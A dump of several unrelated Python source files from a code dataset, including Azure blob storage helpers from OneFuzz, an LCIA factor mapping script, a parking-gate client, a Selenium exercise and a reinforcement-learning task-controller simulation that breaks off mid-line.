self,\n image,\n face_rect,\n *,\n dim=96,\n border=0,\n mask=FaceAlignMask.INNER_EYES_AND_BOTTOM_LIP\n ):\n mask = np.array(mask.value)\n\n landmarks = self.get_landmarks(image, face_rect)\n proper_landmarks = border + dim * self.face_template[mask]\n A = np.hstack([landmarks[mask], np.ones((3, 1))]).astype(np.float64)\n B = np.hstack([proper_landmarks, np.ones((3, 1))]).astype(np.float64)\n T = np.linalg.solve(A, B).T\n\n return tr.warp(\n image,\n tr.AffineTransform(T).inverse,\n output_shape=(dim + 2 * border, dim + 2 * border),\n order=3,\n mode=\"constant\",\n cval=0,\n clip=True,\n preserve_range=True,\n )\n\n def align_faces(self, image, face_rects, *args, **kwargs):\n result = []\n\n for rect in face_rects:\n result.append(self.align_face(image, rect, *args, **kwargs))\n\n return result\n\n\ndef clip_to_range(img):\n return img / 255.0\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"99807442","text":"# -*- coding: utf-8 -*-\nimport utils, os, pandas, numpy, MasterData, time\nfrom copy import copy\n\n#this script takes the mapping ILCD to ecoinvent and creates the \n#public excel file of the mapped CFs, and the standard method xlsx\n\ndef apply_status(x):\n if utils.is_empty(x[0]):\n return 'method orphan'\n elif utils.is_empty(x[1]):\n return 'ecoinvent orphan'\n else:\n return 'mapped'\n\ndef mapping_to_mapped(version):\n ecoQuery_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\internal\\LCIA management\\{}\\ecoQuery files'.format(version)\n mapping_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\internal\\LCIA management\\{}\\mapping files'.format(version)\n \n #load category mapping\n filename = 'category_mapping_{}.xlsx'.format(version)\n tab = 'categories'\n category_mapping = utils.read_excel(mapping_folder, filename, tab)\n tab = 'methods'\n method_uuid = utils.read_excel(mapping_folder, filename, tab)\n method_uuid = method_uuid.set_index('method')\n \n #load ee mapping\n filename = 'recipe_mapping_3.5.xlsx'\n tab = 'Sheet1'\n ee_mapping = utils.read_excel(mapping_folder, filename, tab)\n ee_mapping = utils.replace_empty_in_df(ee_mapping, '')\n category_mapping['ecoinvent name'] = category_mapping[\n ['category name in ecoinvent', 'indicator name in ecoinvent']].apply(\n lambda x: x[0] + '//' + x[1], axis = 1)\n dfs = []\n def apply_scaling(x):\n if utils.is_empty(x[1]):\n return ''\n else:\n return x[1] * x[0]\n def apply_mapped_correction(x):\n to_correct = False\n if x[0] == 'mapped':\n to_correct = True\n for u in tuple(x.to_dict().values())[1:]:\n if not utils.is_empty(u):\n to_correct = False\n break\n return to_correct\n for method_name in ['ReCiPe Midpoint (I) V1.13', 'ReCiPe Midpoint (H) V1.13', 'ReCiPe Midpoint (E) V1.13']:\n #load CFs\n print(method_name)\n tab = 'CFs'\n filename = method_uuid.loc[method_name, 'standard excel filename']\n method = utils.read_excel(ecoQuery_folder, filename, tab)\n index = ['simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit']\n method = method.rename(columns = dict(zip(['substance', 'compartment', 'subcompartment', 'unit'], index)))\n df = ee_mapping.set_index(index).join(method.set_index(index), how = 'outer').reset_index()\n df = utils.replace_empty_in_df(df, '')\n for col in df:\n df = df.replace(to_replace = {col: {'(no match)': ''}})\n category_mapping_ = category_mapping[category_mapping['method name in ecoinvent'].apply(\n lambda x: method_name in x)]\n d = dict(zip(list(category_mapping_['category name in method']), list(category_mapping_['ecoinvent name'])))\n cols = list(d.keys())\n cols.insert(0, 'status')\n df['status'] = df[['ecoinvent name', 'simapro name']].apply(apply_status, axis = 1)\n c = df[cols].apply(apply_mapped_correction, axis = 1)\n for col in index:\n df.loc[c, col] = ''\n df.loc[c, 'status'] = 'ecoinvent orphan'\n df = df.rename(columns = d)\n #convert CFs using factor\n mapped = df[df['status'] == 'mapped']\n df = df[df['status'] != 'mapped']\n \n for col in d.values():\n mapped[col] = mapped[['conversion factor', col]].apply(apply_scaling, axis = 1)\n df = pandas.concat([mapped, df])\n \n #write mapped to excel\n df['comment'] = ''\n columns = [\n 'ecoinvent name', 'ecoinvent compartment', 'ecoinvent subcompartment', 'ecoinvent unit', \n 'simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit', \n 'status', 'conversion factor', 'comment']\n columns.extend(tuple(d.values()))\n sel = utils.dataframe_to_series(method_uuid.loc[method_name])\n dfs.append((df, sel['tab in mapped'], columns))\n columns = ['method name in ecoinvent', 'category name in ecoinvent', 'indicator name in ecoinvent', 'unit']\n category_mapping = category_mapping.rename(columns = {'unit in ecoinvent': 'unit'})\n dfs.append((category_mapping, 'units', columns))\n \n read_me = read_me = [['', '']]*7#space for logo\n read_me.extend([\n ['© ecoinvent {}'.format(utils.timestamp().split('-')[0])], \n ['python script', os.path.realpath(__file__)], \n ['file generation date', utils.timestamp()], \n ['file purpose', 'This file shows the explicit correspondance between ecoinvent nomenclature, method nomenclature, and associated CFs'], \n ['method version', '1.13'], \n ['source', 'as found in Simapro'], \n ])\n filename = utils.remove_forbiden_in_filename(sel['mapped excel filename'].format(version))\n utils.dataframe_to_excel(ecoQuery_folder, filename, dfs, read_me = read_me, feedback = True)\nif __name__ == '__main__':\n mapping_to_mapped('3.5')","sub_path":"projects/LCIA_management/recipe/ReCiPe_mapping_to_mapped.py","file_name":"ReCiPe_mapping_to_mapped.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"448032724","text":"\n# Este archivo es el encargado de recibir la placa leída y decidir si dejar\n# pasar a un vehículo o no, dependiendo de la configuración de este. Además,\n# busca si la placa está registrada en el sistema, en caso de estarlo, busca\n# el usuario asociado al vehículo.\n\n# Este archivo básicamente maneja las alertas que se generan en el sistema.\n\n\n# from ac_seguridad.models import *\nfrom mysocket import MySocket\nimport socket\nimport pdb\nimport sys\nimport requests\n# Constantes.\nNUM_PUERTA = 5\nRIF = \"12345\"\nHOST = \"localhost\"\nPORT = 8000\n#1234 acceso restringido\n#0000 acceso no restringido\n#pdb.set_trace()\n# Funciones\ndef leer_placa():\n placa = input(\"Placa: \")\n return placa\ndef leer_ticket():\n ticket = input(\"ticket: \")\n resgistrado = input(\"registrado(True,False): \")\n return ticket, resgistrado\n\n# Programa comienza aquí.\n# ref: https://docs.python.org/3/howto/sockets.html\n# Crear un socket como cliente.\nprint(\"Creando socket\")\n# socket_cliente = MySocket()\n# socket_cliente.connect(host=HOST, port=PORT)\nprint(\"Socket conectado.\")\n\n# Enviar primer mensaje:\n# Estructura del primer mensaje:\n# * RIF: lleno\n# * ticket: None.\n# * placa: llena.\n# * tipo: llena ('placa_leida')\n# * puerta: llena.\n# * lectura_automatica: llena, sus posibles valores son:\n # True: lectura realizada de forma automática\n # False: lentura realizada de forma manual\n # None: No aplica la información (ejemplo, mensajes servidor-cliente)\n# * registrado: llena, true o false\n\nprint(\"Preparando mensaje\")\nmensaje = dict()\nmensaje['estacionamiento'] = RIF\nmensaje['ticket'], mensaje['registrado'] = leer_ticket()\nmensaje['placa'] = leer_placa()\nmensaje['puerta'] = NUM_PUERTA\nmensaje['tipo'] = 'placa_leida_salida'\nmensaje['lectura_automatica']= True\n\n\n\n\nprint(\"Enviando mensaje: {}\".format(mensaje))\n# socket_cliente.sendall_json(mensaje)\n# socket_cliente.mysend(\"Hola, este es el mensaje\\0\".encode(encoding=\"utf-8\", errors=\"strict\"))\nurl = \"http://{}:{}/manejador/manejar_mensaje/\".format(HOST,PORT)\ndata_mensaje = mensaje\nrespuesta_request = requests.post(url, data=data_mensaje)\nrespuesta = respuesta_request.json()\nprint(\"Mensaje enviado\")\n\nprint(\"Recibiendo respuesta\")\n# respuesta = socket_cliente.receive()\nprint(\"Respuesta recibida: {}\".format(respuesta))\n\nif (respuesta['tipo'] == \"OK_salida_estacionamiento\"):\n print(\"Luz verde.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_placa\"):\n print(\"Luz roja.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_pagado\"):\n print(\"Luz roja.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_no_encontrado\"):\n print(\"Luz roja.\")\n\nelse:\n print(\"Respuesta no válida\")\n\n# socket_cliente.sock.shutdown(socket.SHUT_WR)\n# socket_cliente.sock.close()\n","sub_path":"project/manejador/cliente_salida.py","file_name":"cliente_salida.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"340249914","text":"minimum = 10\nd = {}\n\n\n# recurse 안에서 시계 / 반시계\n\ndef recurse(weak, dist, cnt, n, clockwise):\n global minimum\n global d\n print(56, weak, dist, cnt)\n if not weak:\n if minimum > cnt:\n minimum = cnt\n return\n elif len(weak) == 1:\n if minimum > cnt+1:\n minimum = cnt +1\n return\n else:\n key = tuple(sorted(list(weak)))\n if d.get(key):\n if len(d[key]) >= len(dist):\n return\n else:\n d[key] = dist\n else:\n d[key] = dist\n\n if dist:\n friend = dist.pop()\n else:\n return\n for w in weak:\n todo = weak.copy()\n #clock\n print(12, \"friend\", friend)\n steps = range(w, w+friend+1) if clockwise else range(w , w-friend-1, -1)\n for k in steps:\n k = k % n\n print(k, end=' ')\n if k in todo:\n todo.remove(k)\n print()\n if todo == weak: # 더 이상 답이 없음 => 지우려고 해봐도 안지워짐\n return\n else:\n recurse(todo, dist[:], cnt + 1, n, clockwise)\n\n #counter\n\n\ndef solution(n, weak, dist):\n global minimum\n global d\n minimum = 10\n d = {}\n dist = sorted(dist)\n recurse(set(weak), dist[:], 0, n, True)\n print(d)\n d = {}\n recurse(set(weak), dist[:], 0, n, False)\n print(d)\n return minimum\n\n\nprint(\"answer\", solution(12, [1, 5, 6, 10], [1, 2, 3, 4]))\nprint(\"answer\", solution(12, [1, 3, 4, 9, 10], [3, 5, 7]))\n","sub_path":"practice/programmers/외벽점검.py","file_name":"외벽점검.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"225985468","text":"from selenium import webdriver\nimport time \n\nlink = \"http://suninjuly.github.io/math.html\"\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n people_radio = browser.find_element_by_id(\"peopleRule\")\n people_checked = people_radio.get_attribute(\"checked\")\n\n robots_radio = browser.find_element_by_id(\"robotsRule\")\n robots_checked = robots_radio.get_attribute(\"checked\")\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(10)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"113434115","text":"#!/usr/bin/env python\n#\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport datetime\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Dict, Optional, Union, cast\n\nfrom azure.common import AzureHttpError, AzureMissingResourceHttpError\nfrom azure.storage.blob import BlobPermissions, BlockBlobService, ContainerPermissions\nfrom memoization import cached\nfrom onefuzztypes.primitives import Container\n\nfrom .storage import (\n StorageType,\n choose_account,\n get_accounts,\n get_storage_account_name_key,\n)\n\n\n@cached\ndef get_blob_service(account_id: str) -> BlockBlobService:\n logging.debug(\"getting blob container (account_id: %s)\", account_id)\n account_name, account_key = get_storage_account_name_key(account_id)\n service = BlockBlobService(account_name=account_name, account_key=account_key)\n return service\n\n\ndef get_service_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[BlockBlobService]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n service = get_blob_service(account)\n return service\n\n\ndef container_exists_on_account(container: Container, account_id: str) -> bool:\n try:\n get_blob_service(account_id).get_container_properties(container)\n return True\n except AzureHttpError:\n return False\n\n\ndef container_metadata(container: Container, account: str) -> Optional[Dict[str, str]]:\n try:\n result = get_blob_service(account).get_container_metadata(container)\n return cast(Dict[str, str], result)\n except AzureHttpError:\n pass\n return None\n\n\ndef get_account_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[str]:\n accounts = get_accounts(storage_type)\n\n # check secondary accounts first by searching in reverse.\n #\n # By implementation, the primary account is specified first, followed by\n # any secondary accounts.\n #\n # Secondary accounts, if they exist, are preferred for containers and have\n # increased IOP rates, this should be a slight optimization\n for account in reversed(accounts):\n if container_exists_on_account(container, account):\n return account\n return None\n\n\ndef container_exists(container: Container, storage_type: StorageType) -> bool:\n return get_account_by_container(container, storage_type) is not None\n\n\ndef get_containers(storage_type: StorageType) -> Dict[str, Dict[str, str]]:\n containers: Dict[str, Dict[str, str]] = {}\n\n for account_id in get_accounts(storage_type):\n containers.update(\n {\n x.name: x.metadata\n for x in get_blob_service(account_id).list_containers(\n include_metadata=True\n )\n }\n )\n\n return containers\n\n\ndef get_container_metadata(\n container: Container, storage_type: StorageType\n) -> Optional[Dict[str, str]]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n\n return container_metadata(container, account)\n\n\ndef create_container(\n container: Container,\n storage_type: StorageType,\n metadata: Optional[Dict[str, str]],\n) -> Optional[str]:\n service = get_service_by_container(container, storage_type)\n if service is None:\n account = choose_account(storage_type)\n service = get_blob_service(account)\n try:\n service.create_container(container, metadata=metadata)\n except AzureHttpError as err:\n logging.error(\n (\n \"unable to create container. account: %s \"\n \"container: %s metadata: %s - %s\"\n ),\n account,\n container,\n metadata,\n err,\n )\n return None\n\n return get_container_sas_url_service(\n container,\n service,\n read=True,\n add=True,\n create=True,\n write=True,\n delete=True,\n list=True,\n )\n\n\ndef delete_container(container: Container, storage_type: StorageType) -> bool:\n accounts = get_accounts(storage_type)\n for account in accounts:\n service = get_blob_service(account)\n if bool(service.delete_container(container)):\n return True\n\n return False\n\n\ndef get_container_sas_url_service(\n container: Container,\n service: BlockBlobService,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n expiry = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n permission = ContainerPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_container_shared_access_signature(\n container, permission=permission, expiry=expiry\n )\n\n url = service.make_container_url(container, sas_token=sas_token)\n url = url.replace(\"?restype=container&\", \"?\")\n return str(url)\n\n\ndef get_container_sas_url(\n container: Container,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to create container sas for missing container\")\n\n return get_container_sas_url_service(\n container,\n service,\n read=read,\n add=add,\n create=create,\n write=write,\n delete=delete,\n list=list,\n )\n\n\ndef get_file_sas_url(\n container: Container,\n name: str,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n days: int = 30,\n hours: int = 0,\n minutes: int = 0,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n expiry = datetime.datetime.utcnow() + datetime.timedelta(\n days=days, hours=hours, minutes=minutes\n )\n permission = BlobPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_blob_shared_access_signature(\n container, name, permission=permission, expiry=expiry\n )\n\n url = service.make_blob_url(container, name, sas_token=sas_token)\n return str(url)\n\n\ndef save_blob(\n container: Container,\n name: str,\n data: Union[str, bytes],\n storage_type: StorageType,\n) -> None:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n if isinstance(data, str):\n service.create_blob_from_text(container, name, data)\n elif isinstance(data, bytes):\n service.create_blob_from_bytes(container, name, data)\n\n\ndef get_blob(\n container: Container, name: str, storage_type: StorageType\n) -> Optional[bytes]:\n service = get_service_by_container(container, storage_type)\n if not service:\n return None\n\n try:\n blob = service.get_blob_to_bytes(container, name).content\n return cast(bytes, blob)\n except AzureMissingResourceHttpError:\n return None\n\n\ndef blob_exists(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, storage_type)\n if not service:\n return False\n\n try:\n service.get_blob_properties(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef delete_blob(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, storage_type)\n if not service:\n return False\n\n try:\n service.delete_blob(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef auth_download_url(container: Container, filename: str) -> str:\n instance = os.environ[\"ONEFUZZ_INSTANCE\"]\n return \"%s/api/download?%s\" % (\n instance,\n urllib.parse.urlencode({\"container\": container, \"filename\": filename}),\n )\n","sub_path":"src/api-service/__app__/onefuzzlib/azure/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"506180651","text":"import torch\r\nimport getopt\r\nimport sys\r\nimport csv\r\nimport os\r\nimport simulation as sim\r\nimport math\r\nfrom random import randint\r\nfrom analysis import gData, MODE_MAP\r\nfrom tqdm import tqdm\r\nfrom numpy.random import choice\r\nfrom torch.autograd import Variable\r\nimport pandas as pd\r\nimport analysis\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import pchip_interpolate\r\nimport matplotlib.pyplot as plt\r\nfrom analysis import save_plt_figure\r\n\r\nfrom mdp import MDP\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nimport dill as pickle # see https://stackoverflow.com/questions/25348532/can-python-pickle-lambda-functions\r\nimport random\r\n\r\nfrom mdp import MDP\r\nfrom ddqn import DoubleDQN\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nfrom analysis import gData, RESULTS_FOLDER, COLUMNS, DETAIL_COLUMNS\r\nfrom common import makedir\r\nimport analysis\r\nfrom math import ceil\r\n#from main import MODE_LIST\r\n# preset constants\r\nMDP_STAGES = 2\r\nTOTAL_EPISODES = 200\r\nTRIALS_PER_EPISODE = 80\r\nSPE_LOW_THRESHOLD = 0.3#0.3\r\nSPE_HIGH_THRESHOLD = 0.45#0.5\r\nRPE_LOW_THRESHOLD = 4\r\nRPE_HIGH_THRESHOLD = 9 #10\r\nMF_REL_HIGH_THRESHOLD = 0.8\r\nMF_REL_LOW_THRESHOLD = 0.5\r\nMB_REL_HIGH_THRESHOLD = 0.7\r\nMB_REL_LOW_THRESHOLD = 0.3\r\nCONTROL_REWARD = 1\r\nCONTROL_REWARD_BIAS = 0\r\nINIT_CTRL_INPUT = [10, 0.5]\r\nDEFAULT_CONTROL_MODE = 'max-spe'\r\nCONTROL_MODE = DEFAULT_CONTROL_MODE\r\nCTRL_AGENTS_ENABLED = True\r\nRPE_DISCOUNT_FACTOR = 0.003\r\nACTION_PERIOD = 3\r\nSTATIC_CONTROL_AGENT = False\r\nENABLE_PLOT = True\r\nDISABLE_C_EXTENSION = False\r\nLEGACY_MODE = False\r\nMORE_CONTROL_INPUT = True\r\nSAVE_CTRL_RL = False\r\nPMB_CONTROL = False\r\nTASK_TYPE = 2020\r\nMF_ONLY = False\r\nMB_ONLY = False\r\nReproduce_BHV = False\r\nsaved_policy_path = ''\r\nSession_block = False\r\nmode202010 = False\r\nDECAY_RATE = 0.5\r\nturn_off_tqdm = False\r\nCONTROL_resting = 99 #Intial duration for CONTROL agent resting\r\nmax_sbj = 82\r\n\r\nRESET = False\r\nSAVE_LOG_Q_VALUE = False\r\nMIXED_RANDOM_MODE = False\r\nRANDOM_MODE_LIST = ['min-rpe', 'max-rpe', 'min-spe', 'max-spe']\r\n\r\n\r\nerror_reward_map = {\r\n # x should be a 4-tuple: rpe, spe, mf_rel, mb_rel\r\n # x should be a 5-tuple: rpe, spe, mf_rel, mb_rel, PMB - updated\r\n 'min-rpe' : (lambda x: x[0] < RPE_LOW_THRESHOLD),\r\n 'max-rpe' : (lambda x: x[0] > RPE_HIGH_THRESHOLD),\r\n 'min-spe' : (lambda x: x[1] < SPE_LOW_THRESHOLD),\r\n 'max-spe' : (lambda x: x[1] > SPE_HIGH_THRESHOLD),\r\n 'min-mf-rel' : (lambda x: x[2] < MF_REL_LOW_THRESHOLD),\r\n 'max-mf-rel' : (lambda x: x[2] > MF_REL_HIGH_THRESHOLD),\r\n 'min-mb-rel' : (lambda x: x[3] < MB_REL_LOW_THRESHOLD),\r\n 'max-mb-rel' : (lambda x: x[3] > MB_REL_HIGH_THRESHOLD),\r\n 'min-rpe-min-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'max-rpe-max-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'min-rpe-max-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'max-rpe-min-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'random' : lambda x: 0\r\n}\r\n\r\n\r\ndef create_lst(x):\r\n return [x] * TRIALS_PER_EPISODE\r\n\r\nstatic_action_map = {\r\n 'min-rpe' : create_lst(0),\r\n 'max-rpe' : create_lst(3),\r\n 'min-spe' : create_lst(0),\r\n 'max-spe' : create_lst(1),\r\n 'min-rpe-min-spe' : create_lst(0),\r\n 'max-rpe-max-spe' : create_lst(3),\r\n 'min-rpe-max-spe' : create_lst(1),\r\n 'max-rpe-min-spe' : create_lst(2)\r\n}\r\n\r\ndef error_to_reward(error, PMB=0 , mode=DEFAULT_CONTROL_MODE, bias=CONTROL_REWARD_BIAS):\r\n \"\"\"Compute reward for the task controller. Based on the input scenario (mode), the reward function is determined from the error_reward_map dict.\r\n Args:\r\n error (float list): list with player agent's internal states. Current setting: RPE/SPE/MF-Rel/MB-Rel/PMB\r\n For the error argument, please check the error_reward_map\r\n PMB (float): PMB value of player agents. Currently duplicated with error argument.\r\n mode (string): type of scenario\r\n\r\n Return:\r\n action (int): action to take by human agent\r\n \"\"\"\r\n if TASK_TYPE == 2019:\r\n try:\r\n cmp_func = error_reward_map[mode]\r\n except KeyError:\r\n print(\"Warning: control mode {0} not found, use default mode {1}\".format(mode, DEFAULT_CONTROL_MODE))\r\n cmp_func = error_reward_map[DEFAULT_CONTROL_MODE]\r\n\r\n return cmp_func(error)\r\n elif TASK_TYPE == 2020 or TASK_TYPE == 2021:\r\n if mode == 'min-rpe':\r\n reward = (40 - error[0]) * 3\r\n elif mode == 'max-rpe':\r\n reward = error[0] * 10\r\n elif mode == 'min-spe':\r\n reward = (1 - error[1])*150\r\n elif mode == 'max-spe':\r\n reward = error[1]*200\r\n elif mode == 'min-rpe-min-spe':\r\n reward = ((40 - error[0]) * 3 + (1 - error[1]) * 150 ) /2\r\n elif mode == 'max-rpe-max-spe':\r\n reward = ((error[0]) * 10 + (error[1]) * 100) /2\r\n elif mode == 'min-rpe-max-spe':\r\n reward = ((40 - error[0]) * 3 + (error[1]) * 200) /2\r\n elif mode == 'max-rpe-min-spe':\r\n reward = ((error[0]) * 10 + (1 - error[1]) * 150) /2\r\n elif mode == 'random' :\r\n reward = 0\r\n\r\n if PMB_CONTROL:\r\n reward = reward-60*PMB\r\n\r\n return reward # -60*PMB\r\n# if cmp_func(error):\r\n# if CONTROL_REWARD < 0.5 :\r\n# return CONTROL_REWARD + bias\r\n# else :\r\n# return CONTROL_REWARD * ((2-PMB*2)**0.5) + bias\r\n# #return CONTROL_REWARD*(2-2*PMB) + bias\r\n# else:\r\n# return bias\r\n\r\ndef shuffle_simulation(CONTROL_MODE = 'max-rpe', policy_sbj_indx = 0):\r\n pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n pol = pol_list.index(CONTROL_MODE)\r\n\r\n params = []\r\n f = open('regdata.csv')\r\n data = f.readlines()\r\n for sbj in data:\r\n params.append(sbj.split(',')[:-1])\r\n f.close()\r\n for ii in range(len(params)):\r\n for jj in range(len(params[ii])):\r\n params[ii][jj] = float(params[ii][jj])\r\n\r\n\r\n pol_filename = 'history_results/Analysis-Object-'+CONTROL_MODE+'-{0:02d}'.format(policy_sbj_indx)+file_suffix+'.pkl'\r\n\r\n with open(pol_filename,'rb') as f:\r\n pol_sbj_data = pickle.load(f)\r\n NUM_EPISODES, NUM_FULL_FEATS_DATA = pol_sbj_data.data[pol_list[pol]][0].shape\r\n NUM_FULL_TRIALS, NUM_FULL_FEATS_DETAIL = pol_sbj_data.detail[pol_list[pol]][0].shape\r\n TRIALS_PER_EPISODE = ceil(NUM_FULL_TRIALS / NUM_EPISODES)\r\n PMB_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n RPE_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n SPE_shuffle = np.zeros((max_sbj, TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Reward_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Score_shuffle = np.zeros((max_sbj, TOTAL_EPISODES * TRIALS_PER_EPISODE))\r\n\r\n opt_index = pol_sbj_data.data[pol_list[pol]][0]['ctrl_reward'].loc[\r\n 0.2 * len(pol_sbj_data.data[pol_list[pol]][0]):].idxmax()\r\n opt_pol = pol_sbj_data.detail[pol_list[pol]][0]['action'].loc[\r\n opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE:opt_index * TRIALS_PER_EPISODE - 1]\r\n\r\n\r\n for affected_sbj_indx in range(max_sbj):\r\n env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n # initialize human agent one time\r\n sarsa = SARSA(env.action_space[MDP.HUMAN_AGENT_INDEX], env, learning_rate=params[affected_sbj_indx][5]) # SARSA model-free learner\r\n forward = FORWARD(env.observation_space[MDP.HUMAN_AGENT_INDEX],\r\n env.action_space[MDP.HUMAN_AGENT_INDEX],\r\n env.state_reward_func, env.output_states_offset, env.reward_map_func,\r\n learning_rate=params[affected_sbj_indx][5], disable_cforward=True) # forward model-based learner\r\n arb = Arbitrator(AssocRelEstimator(params[affected_sbj_indx][1], env.max_rpe),\r\n BayesRelEstimator(thereshold=params[affected_sbj_indx][0]),\r\n amp_mb_to_mf=params[affected_sbj_indx][2], amp_mf_to_mb=params[affected_sbj_indx][3], temperature=params[affected_sbj_indx][4], MB_ONLY = MB_ONLY, MF_ONLY= MF_ONLY)\r\n # register in the communication controller\r\n env.agent_comm_controller.register('model-based', forward)\r\n for episode in tqdm(range(TOTAL_EPISODES)):\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n sarsa = sarsa_save\r\n forward = forward_save\r\n arb = arb_save\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n cum_d_p_mb = cum_p_mb = cum_mf_rel = cum_mb_rel = cum_rpe = cum_spe = cum_reward = cum_score = 0\r\n cum_ctrl_act = np.zeros(MDP.NUM_CONTROL_ACTION)\r\n arb.episode_number = episode\r\n arb.CONTROL_resting = CONTROL_resting\r\n human_action_list_episode = []\r\n# env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n# env.agent_comm_controller.register('model-based', forward)\r\n for trial in range(TRIALS_PER_EPISODE):\r\n block_indx = trial // int(TRIALS_PER_EPISODE / 4)\r\n if trial % TRIALS_PER_EPISODE == 0:\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n if episode <= CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.bwd_idf = -1\r\n t_d_p_mb = t_p_mb = t_mf_rel = t_mb_rel = t_rpe = t_spe = t_reward = t_score = 0\r\n game_terminate = False\r\n human_obs, control_obs_frag = env.reset()\r\n #control_obs = np.append(control_obs_frag, [10, 0.5])\r\n if episode > CONTROL_resting:\r\n \"\"\"control agent choose action\"\"\"\r\n control_action = int(opt_pol[opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE+ trial])\r\n else:\r\n control_action = 0\r\n cum_ctrl_act[control_action] += 1\r\n \"\"\"control act on environment\"\"\"\r\n if TASK_TYPE == 2019:\r\n if control_action == 3:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n elif TASK_TYPE == 2021:\r\n if control_action == 2:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n _, _, _, _ = env.step([MDP.CONTROL_AGENT_INDEX, control_action])\r\n\r\n current_game_step = 0\r\n\r\n while not game_terminate:\r\n \"\"\"human choose action\"\"\"\r\n if episode < CONTROL_resting:\r\n human_action = randint(0, 1)\r\n else:\r\n human_action = 